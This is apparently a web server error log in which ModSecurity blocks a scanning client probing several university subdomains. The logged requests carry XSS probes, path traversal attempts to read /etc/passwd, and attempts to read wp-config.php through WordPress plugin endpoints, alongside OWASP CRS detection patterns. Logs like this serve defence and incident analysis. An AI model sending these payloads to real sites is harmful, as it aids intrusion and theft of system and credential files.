[Tue Aug 29 11:54:35.544461 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16C8Co-f0AAAqY55gAAAAr"]
[Tue Aug 29 11:54:35.548671 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAApgA0QAAAAH"]
[Tue Aug 29 11:54:35.676621 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAAqdbmMAAAAw"]
[Tue Aug 29 11:54:35.678634 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAApa-FAAAAAg"]
[Tue Aug 29 11:54:35.702562 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAqRzC4AAAAM"]
[Tue Aug 29 11:54:35.704027 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAofnEcAAAAX"]
[Tue Aug 29 11:54:35.704556 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAqQ@uIAAAAB"]
[Tue Aug 29 11:54:35.709664 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16C8Co-f0AAAqeFPAAAAAx"]
[Tue Aug 29 11:54:35.711261 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAApl@BIAAAAo"]
[Tue Aug 29 11:54:35.713512 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAolKicAAAAe"]
[Tue Aug 29 11:54:35.717215 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16C8Co-f0AAApbUVMAAAAh"]
[Tue Aug 29 11:54:35.717679 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAAoz77kAAAAS"]
[Tue Aug 29 11:54:35.723917 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAAqRzC8AAAAM"]
[Tue Aug 29 11:54:36.562741 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16DMCo-f0AAApbUVQAAAAh"]
[Tue Aug 29 11:54:36.649647 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16DMCo-f0AAAqZuZoAAAAs"]
[Tue Aug 29 11:54:37.904196 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DcCo-f0AAApa-FQAAAAg"]
[Tue Aug 29 11:54:37.983078 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DcCo-f0AAAqQ@uYAAAAB"]
[Tue Aug 29 11:54:38.015820 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAAqdbmgAAAAw"]
[Tue Aug 29 11:54:38.057385 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAApV23kAAAAJ"]
[Tue Aug 29 11:54:38.237722 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAApbUVcAAAAh"]
[Tue Aug 29 11:54:38.677169 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAAor7xkAAAAk"]
[Tue Aug 29 11:54:38.682936 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAApgA0oAAAAH"]
[Tue Aug 29 11:54:38.688603 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAAofnFEAAAAX"]
[Tue Aug 29 11:54:38.778955 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAApl@BcAAAAo"]
[Tue Aug 29 11:54:38.788670 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAAoz78AAAAAS"]
[Tue Aug 29 11:54:39.298721 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_4e184a1dd403d6e2d6be4b21ef44b99c064457cd"): Internal error [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16DsCo-f0AAAph8x0AAAAj"]
[Tue Aug 29 11:54:39.299525 2023] [:error] [pid 2707] [client ::1] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_805d299efc49e63d0731214e13ae1523d643a5fb"): Internal error [hostname "unla-WEB.unla.ac.id"] [uri "*"] [unique_id "ZO16D8Co-f0AAAqTvkIAAAAa"]
[Tue Aug 29 11:54:39.531233 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAAqWwXQAAAAl"]
[Tue Aug 29 11:54:39.766193 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_cb955ad0647d3651c348d2641017377fe3d6211a"): Internal error [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAAqWwXQAAAAl"]
